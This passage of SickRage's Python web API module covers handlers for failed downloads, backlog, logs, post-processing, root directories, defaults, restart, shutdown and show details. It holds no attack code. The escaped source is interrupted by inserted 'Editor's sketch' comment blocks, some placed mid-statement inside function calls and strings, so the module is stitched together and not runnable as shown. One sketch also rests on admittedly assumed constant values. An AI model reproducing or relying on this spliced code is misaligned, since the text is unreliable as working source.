FROM failed"")\n else:\n sql_results = my_db.select(""SELECT * FROM failed LIMIT ?"", [u_limit])\n\n return _responds(RESULT_SUCCESS, sql_results)\n\n\nclass CMD_Backlog(ApiCall):\n _help = {""desc"": ""Get the backlogged episodes""}\n\n def __init__(self, 
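# --- Editor's sketch: CMD_Failed above clamps the caller's limit to 100
# and treats 0 as "no limit", switching between two parameterized
# queries. The same decision, standalone:
def build_failed_query(limit):
    u_limit = min(int(limit), 100)
    if u_limit == 0:
        return 'SELECT * FROM failed', []
    return 'SELECT * FROM failed LIMIT ?', [u_limit]

if __name__ == '__main__':
    assert build_failed_query(0) == ('SELECT * FROM failed', [])
    assert build_failed_query(500) == ('SELECT * FROM failed LIMIT ?', [100])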
args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the backlogged episodes """"""\n\n shows = []\n\n my_db = db.DBConnection(row_type=""dict"")\n for curShow in sickbeard.showList:\n\n show_eps = []\n\n sql_results = my_db.select(\n ""SELECT tv_episodes.*, tv_shows.paused FROM tv_episodes INNER JOIN tv_shows ON tv_episodes.showid = tv_shows.indexer_id WHERE showid = ? and paused = 0 ORDER BY season DESC, episode DESC"",\n [curShow.indexerid])\n\n for curResult in sql_results:\n\n cur_ep_cat = curShow.getOverview(int(curResult[""status""] or -1))\n if cur_ep_cat and cur_ep_cat in (Overview.WANTED, Overview.QUAL):\n show_eps.append(curResult)\n\n if show_eps:\n shows.append({\n ""indexerid"": curShow.indexerid,\n ""show_name"": curShow.name,\n ""status"": curShow.status,\n ""episodes"": show_eps\n })\n\n return _responds(RESULT_SUCCESS, shows)\n\n\nclass CMD_Logs(ApiCall):\n _help = {\n ""desc"": ""Get the logs"",\n ""optionalParameters"": {\n ""min_level"": {\n ""desc"":\n ""The minimum level classification of log entries to return. ""\n ""Each level inherits its above levels: debug < info < warning < error""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.min_level, args = self.check_params(args, kwargs, ""min_level"", ""error"", False, ""string"",\n [""error"", ""warning"", ""info"", ""debug""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the logs """"""\n # 10 = Debug / 20 = Info / 30 = Warning / 40 = Error\n min_level = logger.reverseNames[str(self.min_level).upper()]\n\n data = []\n if ek(os.path.isfile, logger.logFile):\n with io.open(logger.logFile, \'r\', encoding=\'utf-8\') as f:\n data = f.readlines()\n\n regex = r""^(\\d\\d\\d\\d)\\-(\\d\\d)\\-(\\d\\d)\\s*(\\d\\d)\\:(\\d\\d):(\\d\\d)\\s*([A-Z]+)\\s*(.+?)\\s*\\:\\:\\s*(.*)$""\n\n final_data = []\n\n num_lines = 0\n last_line = False\n num_to_show = min(50, len(data))\n\n for x in reversed(data):\n\n match = re.match(regex, x)\n\n if match:\n level = match.group(7)\n if level not in logger.reverseNames:\n last_line = False\n continue\n\n if logger.reverseNames[level] >= min_level:\n last_line = True\n final_data.append(x.rstrip(""\\n""))\n else:\n last_line = False\n continue\n\n elif last_line:\n final_data.append(""AA"" + x)\n\n num_lines += 1\n\n if num_lines >= num_to_show:\n break\n\n return _responds(RESULT_SUCCESS, final_data)\n\n\nclass CMD_PostProcess(ApiCall):\n _help = {\n ""desc"": ""Manually post-process the files in the download folder"",\n ""optionalParameters"": {\n ""path"": {""desc"": ""The path to the folder to post-process""},\n ""force_replace"": {""desc"": ""Force already post-processed files to be post-processed again""},\n ""return_data"": {""desc"": ""Returns the result of the post-process""},\n ""process_method"": {""desc"": ""How should valid post-processed files be handled""},\n ""is_priority"": {""desc"": ""Replace the file even if it exists in a higher quality""},\n ""failed"": {""desc"": ""Mark download as failed""},\n ""type"": {""desc"": ""The type of post-process being requested""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.path, args = self.check_params(args, kwargs, ""path"", None, False, ""string"", [])\n self.force_replace, args = self.check_params(args, kwargs, ""force_replace"", False, False, ""bool"", [])\n self.return_data, args = self.check_params(args, kwargs, ""return_data"", 
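# --- Editor's sketch: CMD_Logs above walks the log file in reverse and
# keeps entries at or above the requested level (10=DEBUG .. 40=ERROR,
# matching the comment in the handler). A simplified model of that
# filter; the timestamp pattern here is illustrative, not the handler's
# exact regex:
import re

LEVELS = {'DEBUG': 10, 'INFO': 20, 'WARNING': 30, 'ERROR': 40}
LINE_RE = re.compile(r'^\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}\s+([A-Z]+)\s')

def filter_log_lines(lines, min_level='ERROR', max_lines=50):
    keep = []
    for line in reversed(lines):
        match = LINE_RE.match(line)
        if match and LEVELS.get(match.group(1), 0) >= LEVELS[min_level]:
            keep.append(line.rstrip('\n'))
        if len(keep) >= max_lines:
            break
    return keep

if __name__ == '__main__':
    sample = ['2015-01-01 10:00:00 DEBUG noise\n',
              '2015-01-01 10:00:01 ERROR boom\n']
    assert filter_log_lines(sample) == ['2015-01-01 10:00:01 ERROR boom']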
False, False, ""bool"", [])\n self.process_method, args = self.check_params(args, kwargs, ""process_method"", False, False, ""string"",\n [""copy"", ""symlink"", ""hardlink"", ""move""])\n self.is_priority, args = self.check_params(args, kwargs, ""is_priority"", False, False, ""bool"", [])\n self.failed, args = self.check_params(args, kwargs, ""failed"", False, False, ""bool"", [])\n self.type, args = self.check_params(args, kwargs, ""type"", ""auto"", None, ""string"", [""auto"", ""manual""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Manually post-process the files in the download folder """"""\n if not self.path and not sickbeard.TV_DOWNLOAD_DIR:\n return _responds(RESULT_FAILURE, msg=""You need to provide a path or set TV Download Dir"")\n\n if not self.path:\n self.path = sickbeard.TV_DOWNLOAD_DIR\n\n if not self.type:\n self.type = \'manual\'\n\n data = processTV.processDir(self.path, process_method=self.process_method, force=self.force_replace,\n is_priority=self.is_priority, failed=self.failed, proc_type=self.type)\n\n if not self.return_data:\n data = """"\n\n return _responds(RESULT_SUCCESS, data=data, msg=""Started post-process for %s"" % self.path)\n\n\nclass CMD_SickBeard(ApiCall):\n _help = {""desc"": ""Get miscellaneous information about SickRage""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" dGet miscellaneous information about SickRage """"""\n data = {""sr_version"": sickbeard.BRANCH, ""api_version"": self.version,\n ""api_commands"": sorted(function_mapper.keys())}\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_SickBeardAddRootDir(ApiCall):\n _help = {\n ""desc"": ""Add a new root (parent) directory to SickRage"",\n ""requiredParameters"": {\n ""location"": {""desc"": ""The full path to the new root (parent) directory""},\n },\n ""optionalParameters"": {\n ""default"": {""desc"": ""Make this new location the default root (parent) directory""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", [])\n # optional\n self.default, args = self.check_params(args, kwargs, ""default"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Add a new root (parent) directory to SickRage """"""\n\n self.location = urllib.unquote_plus(self.location)\n location_matched = 0\n index = 0\n\n # disallow adding/setting an invalid dir\n if not ek(os.path.isdir, self.location):\n return _responds(RESULT_FAILURE, msg=""Location is invalid"")\n\n root_dirs = []\n\n if sickbeard.ROOT_DIRS == """":\n self.default = 1\n else:\n root_dirs = sickbeard.ROOT_DIRS.split(\'|\')\n index = int(sickbeard.ROOT_DIRS.split(\'|\')[0])\n root_dirs.pop(0)\n # clean up the list - replace %xx escapes by their single-character equivalent\n root_dirs = [urllib.unquote_plus(x) for x in root_dirs]\n for x in root_dirs:\n if x == self.location:\n location_matched = 1\n if self.default == 1:\n index = root_dirs.index(self.location)\n break\n\n if location_matched == 0:\n if self.default == 1:\n root_dirs.insert(0, self.location)\n else:\n root_dirs.append(self.location)\n\n root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs]\n root_dirs_new.insert(0, index)\n root_dirs_new = \'|\'.join(unicode(x) for x in root_dirs_new)\n\n sickbeard.ROOT_DIRS = root_dirs_new\n return 
_responds(RESULT_SUCCESS, _get_root_dirs(), msg=""Root directories updated"")\n\n\nclass CMD_SickBeardCheckVersion(ApiCall):\n _help = {""desc"": ""Check if a new version of SickRage is available""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n check_version = CheckVersion()\n needs_update = check_version.check_for_new_version()\n\n data = {\n ""current_version"": {\n ""branch"": check_version.get_branch(),\n ""commit"": check_version.updater.get_cur_commit_hash(),\n ""version"": check_version.updater.get_cur_version(),\n },\n ""latest_version"": {\n ""branch"": check_version.get_branch(),\n ""commit"": check_version.updater.get_newest_commit_hash(),\n ""version"": check_version.updater.get_newest_version(),\n },\n ""commits_offset"": check_version.updater.get_num_commits_behind(),\n ""needs_update"": needs_update,\n }\n\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_SickBeardCheckScheduler(ApiCall):\n _help = {""desc"": ""Get information about the scheduler""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get information about the scheduler """"""\n my_db = db.DBConnection()\n sql_results = my_db.select(""SELECT last_backlog FROM info"")\n\n backlog_paused = sickbeard.searchQueueScheduler.action.is_backlog_paused() # @UndefinedVariable\n backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress() # @UndefinedVariable\n next_backlog = sickbeard.backlogSearchScheduler.nextRun().strftime(dateFormat).decode(sickbeard.SYS_ENCODING)\n\n data = {""backlog_is_paused"": int(backlog_paused), ""backlog_is_running"": int(backlog_running),\n ""last_backlog"": _ordinal_to_date_form(sql_results[0][""last_backlog""]),\n ""next_backlog"": next_backlog}\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_SickBeardDeleteRootDir(ApiCall):\n _help = {\n ""desc"": ""Delete a root (parent) directory from SickRage"",\n ""requiredParameters"": {\n ""location"": {""desc"": ""The full path to the root (parent) directory to remove""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Delete a root (parent) directory from SickRage """"""\n if sickbeard.ROOT_DIRS == """":\n return _responds(RESULT_FAILURE, _get_root_dirs(), msg=""No root directories detected"")\n\n new_index = 0\n root_dirs_new = []\n root_dirs = sickbeard.ROOT_DIRS.split(\'|\')\n index = int(root_dirs[0])\n root_dirs.pop(0)\n # clean up the list - replace %xx escapes by their single-character equivalent\n root_dirs = [urllib.unquote_plus(x) for x in root_dirs]\n old_root_dir = root_dirs[index]\n for curRootDir in root_dirs:\n if not curRootDir == self.location:\n root_dirs_new.append(curRootDir)\n else:\n new_index = 0\n\n for curIndex, curNewRootDir in enumerate(root_dirs_new):\n if curNewRootDir is old_root_dir:\n new_index = curIndex\n break\n\n root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs_new]\n if len(root_dirs_new) > 0:\n root_dirs_new.insert(0, new_index)\n root_dirs_new = ""|"".join(unicode(x) for x in root_dirs_new)\n\n sickbeard.ROOT_DIRS = root_dirs_new\n # what if the root dir was not found?\n return _responds(RESULT_SUCCESS, _get_root_dirs(), msg=""Root directory 
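# --- Editor's note, with a runnable example: the delete handler above
# locates the old default directory with "curNewRootDir is old_root_dir".
# "is" tests object identity, not value equality, so two equal path
# strings built at different times may not compare as intended; "==" is
# the correct operator for this lookup.
a = '/tv/shows'
b = '/'.join(['', 'tv', 'shows'])      # equal value, separate object
assert a == b                          # value equality always holds
# "a is b" depends on interpreter interning and is typically False here,
# which is exactly how an identity-based lookup can silently miss.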
deleted"")\n\n\nclass CMD_SickBeardGetDefaults(ApiCall):\n _help = {""desc"": ""Get SickRage\'s user default configuration value""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get SickRage\'s user default configuration value """"""\n\n any_qualities, best_qualities = _map_quality(sickbeard.QUALITY_DEFAULT)\n\n data = {""status"": statusStrings[sickbeard.STATUS_DEFAULT].lower(),\n ""flatten_folders"": int(sickbeard.FLATTEN_FOLDERS_DEFAULT), ""initial"": any_qualities,\n ""archive"": best_qualities, ""future_show_paused"": int(sickbeard.COMING_EPS_DISPLAY_PAUSED)}\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_SickBeardGetMessages(ApiCall):\n _help = {""desc"": ""Get all messages""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n messages = []\n for cur_notification in ui.notifications.get_notifications(self.rh.request.remote_ip):\n messages.append({""title"": cur_notification.title,\n ""message"": cur_notification.message,\n ""type"": cur_notification.type})\n return _responds(RESULT_SUCCESS, messages)\n\n\nclass CMD_SickBeardGetRootDirs(ApiCall):\n _help = {""desc"": ""Get all root (parent) directories""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get all root (parent) directories """"""\n\n return _responds(RESULT_SUCCESS, _get_root_dirs())\n\n\nclass CMD_SickBeardPauseBacklog(ApiCall):\n _help = {\n ""desc"": ""Pause or un-pause the backlog search"",\n ""optionalParameters"": {\n ""pause "": {""desc"": ""True to pause the backlog search, False to un-pause it""}\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.pause, args = self.check_params(args, kwargs, ""pause"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Pause or un-pause the backlog search """"""\n if self.pause:\n sickbeard.searchQueueScheduler.action.pause_backlog() # @UndefinedVariable\n return _responds(RESULT_SUCCESS, msg=""Backlog paused"")\n else:\n sickbeard.searchQueueScheduler.action.unpause_backlog() # @UndefinedVariable\n return _responds(RESULT_SUCCESS, msg=""Backlog un-paused"")\n\n\nclass CMD_SickBeardPing(ApiCall):\n _help = {""desc"": ""Ping SickRage to check if it is running""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Ping SickRage to check if it is running """"""\n if sickbeard.started:\n return _responds(RESULT_SUCCESS, {""pid"": sickbeard.PID}, ""Pong"")\n else:\n return _responds(RESULT_SUCCESS, msg=""Pong"")\n\n\nclass CMD_SickBeardRestart(ApiCall):\n _help = {""desc"": ""Restart SickRage""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Restart SickRage """"""\n if not Restart.restart(sickbeard.PID):\n return _responds(RESULT_FAILURE, msg=\'SickRage can not be restarted\')\n\n return _responds(RESULT_SUCCESS, msg=""SickRage is restarting..."")\n\n\nclass CMD_SickBeardSearchIndexers(ApiCall):\n _help = {\n ""desc"": ""Search for a show with a given name on all the indexers, in a specific language"",\n ""optionalParameters"": {\n ""name"": {""desc"": ""The 
name of the show you want to search for""},\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""lang"": {""desc"": ""The 2-letter language code of the desired show""},\n }\n }\n\n def __init__(self, args, kwargs):\n self.valid_languages = sickbeard.indexerApi().config[\'langabbv_to_id\']\n # required\n # optional\n self.name, args = self.check_params(args, kwargs, ""name"", None, False, ""string"", [])\n self.lang, args = self.check_params(args, kwargs, ""lang"", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, ""string"",\n self.valid_languages.keys())\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, False, ""int"", [])\n\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Search for a show with a given name on all the indexers, in a specific language """"""\n\n results = []\n lang_id = self.valid_languages[self.lang]\n\n if self.name and not self.indexerid: # only name was given\n for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:\n indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy()\n\n if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:\n indexer_api_params[\'language\'] = self.lang\n\n indexer_api_params[\'actors\'] = False\n indexer_api_params[\'custom_ui\'] = classes.AllShowsListUI\n\n t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params)\n\n try:\n api_data = t[str(self.name).encode()]\n except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):\n logger.log(u""API :: Unable to find show with id "" + str(self.indexerid), logger.WARNING)\n continue\n\n for curSeries in api_data:\n results.append({indexer_ids[_indexer]: int(curSeries[\'id\']),\n ""name"": curSeries[\'seriesname\'],\n ""first_aired"": curSeries[\'firstaired\'],\n ""indexer"": int(_indexer)})\n\n return _responds(RESULT_SUCCESS, {""results"": results, ""langid"": lang_id})\n\n elif self.indexerid:\n for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:\n indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy()\n\n if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:\n indexer_api_params[\'language\'] = self.lang\n\n indexer_api_params[\'actors\'] = False\n\n t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params)\n\n try:\n my_show = t[int(self.indexerid)]\n except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):\n logger.log(u""API :: Unable to find show with id "" + str(self.indexerid), logger.WARNING)\n return _responds(RESULT_SUCCESS, {""results"": [], ""langid"": lang_id})\n\n if not my_show.data[\'seriesname\']:\n logger.log(\n u""API :: Found show with indexerid: "" + str(\n self.indexerid) + "", however it contained no show name"", logger.DEBUG)\n return _responds(RESULT_FAILURE, msg=""Show contains no name, invalid result"")\n\n # found show\n results = [{indexer_ids[_indexer]: int(my_show.data[\'id\']),\n ""name"": unicode(my_show.data[\'seriesname\']),\n ""first_aired"": my_show.data[\'firstaired\'],\n ""indexer"": int(_indexer)}]\n break\n\n return _responds(RESULT_SUCCESS, {""results"": results, ""langid"": lang_id})\n else:\n return _responds(RESULT_FAILURE, msg=""Either a unique id or name is required!"")\n\n\nclass CMD_SickBeardSearchTVDB(CMD_SickBeardSearchIndexers):\n _help = {\n ""desc"": ""Search for a show with a 
given name on The TVDB, in a specific language"",\n ""optionalParameters"": {\n ""name"": {""desc"": ""The name of the show you want to search for""},\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""lang"": {""desc"": ""The 2-letter language code of the desired show""},\n }\n }\n\n def __init__(self, args, kwargs):\n CMD_SickBeardSearchIndexers.__init__(self, args, kwargs)\n self.indexerid, args = self.check_params(args, kwargs, ""tvdbid"", None, False, ""int"", [])\n\n\nclass CMD_SickBeardSearchTVRAGE(CMD_SickBeardSearchIndexers):\n """"""\n Deprecated, TVRage is no more.\n """"""\n\n _help = {\n ""desc"":\n ""Search for a show with a given name on TVRage, in a specific language. ""\n ""This command should not longer be used, as TVRage was shut down."",\n ""optionalParameters"": {\n ""name"": {""desc"": ""The name of the show you want to search for""},\n ""lang"": {""desc"": ""The 2-letter language code of the desired show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # Leave this one as APICall so it doesnt try and search anything\n # pylint: disable=W0233,W0231\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n return _responds(RESULT_FAILURE, msg=""TVRage is no more, invalid result"")\n\n\nclass CMD_SickBeardSetDefaults(ApiCall):\n _help = {\n ""desc"": ""Set SickRage\'s user default configuration value"",\n ""optionalParameters"": {\n ""initial"": {""desc"": ""The initial quality of a show""},\n ""archive"": {""desc"": ""The archive quality of a show""},\n ""future_show_paused"": {""desc"": ""True to list paused shows in the coming episode, False otherwise""},\n ""flatten_folders"": {""desc"": ""Flatten sub-folders within the show directory""},\n ""status"": {""desc"": ""Status of missing episodes""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"",\n [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""])\n self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"",\n [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""])\n self.future_show_paused, args = self.check_params(args, kwargs, ""future_show_paused"", None, False, ""bool"", [])\n self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"", None, False, ""bool"", [])\n self.status, args = self.check_params(args, kwargs, ""status"", None, False, ""string"",\n [""wanted"", ""skipped"", ""ignored""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Set SickRage\'s user default configuration value """"""\n\n quality_map = {\'sdtv\': Quality.SDTV,\n \'sddvd\': Quality.SDDVD,\n \'hdtv\': Quality.HDTV,\n \'rawhdtv\': Quality.RAWHDTV,\n \'fullhdtv\': Quality.FULLHDTV,\n \'hdwebdl\': Quality.HDWEBDL,\n \'fullhdwebdl\': Quality.FULLHDWEBDL,\n \'hdbluray\': Quality.HDBLURAY,\n \'fullhdbluray\': Quality.FULLHDBLURAY,\n \'unknown\': Quality.UNKNOWN}\n\n i_quality_id = []\n a_quality_id = []\n\n if self.initial:\n for quality in self.initial:\n i_quality_id.append(quality_map[quality])\n if self.archive:\n for quality in self.archive:\n a_quality_id.append(quality_map[quality])\n\n if i_quality_id or a_quality_id:\n sickbeard.QUALITY_DEFAULT = Quality.combineQualities(i_quality_id, a_quality_id)\n\n if self.status:\n # convert the string status to a int\n for status 
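# --- Editor's sketch: CMD_SickBeardSetDefaults maps quality names to
# internal constants and hands the two lists to Quality.combineQualities.
# The bit values and the "archive packed into the high half" layout
# below are ASSUMPTIONS for illustration only; the real constants and
# packing live in sickbeard.common.Quality.
QUALITY_BITS = {'sdtv': 1, 'sddvd': 2, 'hdtv': 4}   # illustrative values

def combine_qualities(initial, archive):
    any_mask = 0
    for name in initial:
        any_mask |= QUALITY_BITS[name]
    best_mask = 0
    for name in archive:
        best_mask |= QUALITY_BITS[name]
    return any_mask | (best_mask << 16)   # assumed packing, see note above

if __name__ == '__main__':
    assert combine_qualities(['sdtv', 'hdtv'], ['hdtv']) == (1 | 4) | (4 << 16)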
in statusStrings:\n if statusStrings[status].lower() == str(self.status).lower():\n self.status = status\n break\n # this should be obsolete because of the above\n if self.status not in statusStrings:\n raise ApiError(""Invalid Status"")\n # only allow the status options we want\n if int(self.status) not in (3, 5, 6, 7):\n raise ApiError(""Status Prohibited"")\n sickbeard.STATUS_DEFAULT = self.status\n\n if self.flatten_folders is not None:\n sickbeard.FLATTEN_FOLDERS_DEFAULT = int(self.flatten_folders)\n\n if self.future_show_paused is not None:\n sickbeard.COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused)\n\n return _responds(RESULT_SUCCESS, msg=""Saved defaults"")\n\n\nclass CMD_SickBeardShutdown(ApiCall):\n _help = {""desc"": ""Shutdown SickRage""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Shutdown SickRage """"""\n if not Shutdown.stop(sickbeard.PID):\n return _responds(RESULT_FAILURE, msg=\'SickRage can not be shut down\')\n\n return _responds(RESULT_SUCCESS, msg=""SickRage is shutting down..."")\n\n\nclass CMD_SickBeardUpdate(ApiCall):\n _help = {""desc"": ""Update SickRage to the latest version available""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n check_version = CheckVersion()\n\n if check_version.check_for_new_version():\n if check_version.run_backup_if_safe():\n check_version.update()\n\n return _responds(RESULT_SUCCESS, msg=""SickRage is updating ..."")\n\n return _responds(RESULT_FAILURE, msg=""SickRage could not backup config ..."")\n\n return _responds(RESULT_FAILURE, msg=""SickRage is already up to date"")\n\n\nclass CMD_Show(ApiCall):\n _help = {\n ""desc"": ""Get detailed information about a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get detailed information about a show """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n show_dict = {\n ""season_list"": CMD_ShowSeasonList((), {""indexerid"": self.indexerid}).run()[""data""],\n ""cache"": CMD_ShowCache((), {""indexerid"": self.indexerid}).run()[""data""]\n }\n\n genre_list = []\n if show_obj.genre:\n genre_list_tmp = show_obj.genre.split(""|"")\n for genre in genre_list_tmp:\n if genre:\n genre_list.append(genre)\n\n show_dict[""genre""] = genre_list\n show_dict[""quality""] = get_quality_string(show_obj.quality)\n\n any_qualities, best_qualities = _map_quality(show_obj.quality)\n show_dict[""quality_details""] = {""initial"": any_qualities, ""archive"": best_qualities}\n\n try:\n show_dict[""location""] = show_obj.location\n except ShowDirectoryNotFoundException:\n show_dict[""location""] = """"\n\n show_dict[""language""] = show_obj.lang\n show_dict[""show_name""] = show_obj.name\n show_dict[""paused""] = (0, 1)[show_obj.paused]\n show_dict[""subtitles""] = (0, 1)[show_obj.subtitles]\n show_dict[""air_by_date""] = (0, 1)[show_obj.air_by_date]\n show_dict[""flatten_folders""] = (0, 
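# --- illustrative sketch (not from the original module) ---
# The "convert the string status to a int" loop above is a linear reverse
# lookup over statusStrings. The same idea as a self-contained helper, using
# a hypothetical subset of the mapping; building the inverse dict once would
# be the cheaper equivalent for repeated lookups.
status_strings = {3: "Wanted", 5: "Skipped", 6: "Archived", 7: "Ignored"}

def status_from_string(name, mapping=status_strings):
    lowered = str(name).lower()
    for code, label in mapping.items():
        if label.lower() == lowered:
            return code
    raise ValueError("Invalid Status: %r" % name)

assert status_from_string("WANTED") == 3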
1)[show_obj.flatten_folders]\n show_dict[""sports""] = (0, 1)[show_obj.sports]\n show_dict[""anime""] = (0, 1)[show_obj.anime]\n show_dict[""airs""] = str(show_obj.airs).replace(\'am\', \' AM\').replace(\'pm\', \' PM\').replace(\' \', \' \')\n show_dict[""dvdorder""] = (0, 1)[show_obj.dvdorder]\n\n if show_obj.rls_require_words:\n show_dict[""rls_require_words""] = show_obj.rls_require_words.split("", "")\n else:\n show_dict[""rls_require_words""] = []\n\n if show_obj.rls_ignore_words:\n show_dict[""rls_ignore_words""] = show_obj.rls_ignore_words.split("", "")\n else:\n show_dict[""rls_ignore_words""] = []\n\n show_dict[""scene""] = (0, 1)[show_obj.scene]\n show_dict[""archive_firstmatch""] = (0, 1)[show_obj.archive_firstmatch]\n\n show_dict[""indexerid""] = show_obj.indexerid\n show_dict[""tvdbid""] = helpers.mapIndexersToShow(show_obj)[1]\n show_dict[""imdbid""] = show_obj.imdbid\n\n show_dict[""network""] = show_obj.network\n if not show_dict[""network""]:\n show_dict[""network""] = """"\n show_dict[""status""] = show_obj.status\n\n if helpers.tryInt(show_obj.nextaired, 1) > 693595:\n dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(show_obj.nextaired, show_dict[\'airs\'], show_dict[\'network\']))\n show_dict[\'airs\'] = sbdatetime.sbdatetime.sbftime(dt_episode_airs, t_preset=timeFormat).lstrip(\'0\').replace(\n \' 0\', \' \')\n show_dict[\'next_ep_airdate\'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)\n else:\n show_dict[\'next_ep_airdate\'] = \'\'\n\n return _responds(RESULT_SUCCESS, show_dict)\n\n\nclass CMD_ShowAddExisting(ApiCall):\n _help = {\n ""desc"": ""Add an existing show in SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""location"": {""desc"": ""Full path to the existing shows\'s folder""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""initial"": {""desc"": ""The initial quality of the show""},\n ""archive"": {""desc"": ""The archive quality of the show""},\n ""flatten_folders"": {""desc"": ""True to flatten the show folder, False otherwise""},\n ""subtitles"": {""desc"": ""True to search for subtitles, False otherwise""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, """", [])\n self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", [])\n # optional\n self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"",\n [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""])\n self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"",\n [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""])\n self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"",\n bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, ""bool"", [])\n self.subtitles, args = self.check_params(args, kwargs, ""subtitles"", 